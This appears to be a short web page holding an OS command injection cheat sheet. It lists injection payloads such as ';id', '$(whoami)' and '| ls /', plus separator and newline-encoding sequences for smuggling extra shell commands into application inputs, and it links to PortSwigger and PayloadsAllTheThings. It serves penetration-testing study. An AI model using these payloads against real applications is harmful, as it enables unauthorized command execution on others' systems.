OS Command Injection
cheat sheet
Identification
;id
;id;
;id|
|id
| ls /
& whoami
`whoami`
$(whoami)
Initial sequence
Follow the initial sequence by your OS command payload
&
&&
|
||
;
"
";
'"
';
%0a
%0d%0a
\0
\n
\r
*;
References
https://portswigger.net/web-security/os-command-injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Last updated
Was this helpful?